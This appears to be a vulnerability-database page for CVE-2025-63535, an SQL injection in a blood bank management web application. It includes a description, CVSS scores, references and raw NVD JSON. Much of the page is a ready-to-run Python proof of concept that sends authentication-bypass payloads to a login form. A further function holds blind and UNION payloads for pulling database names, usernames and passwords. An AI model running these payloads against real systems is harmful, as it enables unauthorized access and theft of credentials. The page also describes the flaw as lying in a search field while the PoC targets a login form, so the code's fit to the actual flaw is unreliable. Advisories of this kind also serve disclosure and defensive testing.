CVE-2025-63535

Description

A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the abs.php component. The application fails to properly sanitize usersupplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Blood Bank Management System 1.0 (abs.php组件)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-63535 SQL Injection PoC for Blood Bank Management System 1.0
# Authentication Bypass via SQL Injection in abs.php

import requests
import sys

target_url = "http://target.com/abs.php"  # Modify to target URL

# SQL Injection Payloads for Authentication Bypass
payloads = [
    "admin' OR '1'='1",
    "admin' OR '1'='1' --",
    "admin' OR '1'='1' #",
    "' OR '1'='1' --",
    "' OR '1'='1' #",
    "' OR '1'='1'/*",
]

def test_sql_injection():
    print(f"[*] Testing CVE-2025-63535 SQL Injection on {target_url}")
    print("[*] Target: Blood Bank Management System 1.0 - abs.php")
    
    for payload in payloads:
        print(f"\n[+] Testing payload: {payload}")
        
        # Login form data (adjust field names based on actual application)
        data = {
            "username": payload,
            "password": payload,
            "submit": "Login"
        }
        
        try:
            response = requests.post(target_url, data=data, timeout=10, verify=False)
            
            # Check for successful login indicators
            if any(indicator in response.text.lower() for indicator in ["dashboard", "admin", "blood", "logout", "welcome"]):
                print(f"[!] Potential authentication bypass with payload: {payload}")
                print("[!] Verify manually for successful login")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    print("\n[-] No obvious authentication bypass detected")
    print("[*] Manual testing recommended with different payloads")
    return False

def extract_data():
    # Boolean-based blind SQL injection for data extraction
    print("\n[*] Extracting database information via blind SQLi...")
    
    # Database version detection
    version_payload = "admin' AND (SELECT SUBSTRING(@@version,1,1))='5' --"
    print(f"[+] Testing database version: {version_payload}")
    
    # Database name extraction
    dbname_payload = "admin' AND (SELECT LENGTH(DATABASE()))>0 --"
    print(f"[+] Extracting database name: {dbname_payload}")
    
    # Users table extraction
    users_payload = "admin' UNION SELECT NULL,username,password FROM users --"
    print(f"[+] Extracting users: {users_payload}")

if __name__ == "__main__":
    test_sql_injection()
    # Uncomment to test data extraction
    # extract_data()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63535
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63535
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63535/
[4] VulDB https://vuldb.com/cve/CVE-2025-63535
[5] https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing
[6] https://github.com/Shridharshukl/Blood-Bank-Management-System
[7] https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63535.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63535", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:56.277", "lastModified": "2025-12-03T22:00:15.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the abs.php component. The application fails to properly sanitize usersupplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"}]}]}], "references": [{"url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/Shridharshukl/Blood-Bank-Management-System", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63535.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}